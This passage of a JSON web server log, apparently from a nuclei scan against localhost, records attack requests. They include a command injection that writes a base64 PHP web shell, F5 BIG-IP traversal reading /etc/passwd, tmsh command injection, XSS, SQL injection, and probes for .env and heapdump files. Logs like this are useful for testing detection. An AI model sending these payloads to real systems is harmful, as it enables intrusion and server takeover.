AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /overview.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.zip HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/users/admin/check HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/heapdump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/nobody/Machine.cgi?action=get_capability HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/status/flags HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_debugbar/open?max=20&offset=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /HelpTheHelpDesk.jsdbx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/page/login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.tar.z HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/login.php?user=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/metadata HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /doc/script/common.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.json/FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.195","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /s/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v1/tasks HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.sqlite HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hsqldb%0a HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.stage HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"{{name}}=glpi&{{password}}=glpi&auth=local&submit=Submit&_glpi_csrf_token={{token}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /front/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/experimental/patternfile?order=id%3Bselect(md5('nuclei'))&page=0&page_size=0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application.ini HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.998","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"command=create%20cli%20alias%20private%20list%20command%20bash","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.live HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.1.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.feed HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.000","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children....4.2.1....json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"command=list%20%2Ftmp%2Fnonexistent","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env.old HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webapi/v1/system/accountmanage/account HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"command=delete%20cli%20alias%20private%20list","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/checklist/images/checklist-icon.php?&fill=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.env_sample HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"{\x22password\x22: \x22{{password}}\x22, \x22identifier\x22: \x22{{username}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:38:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 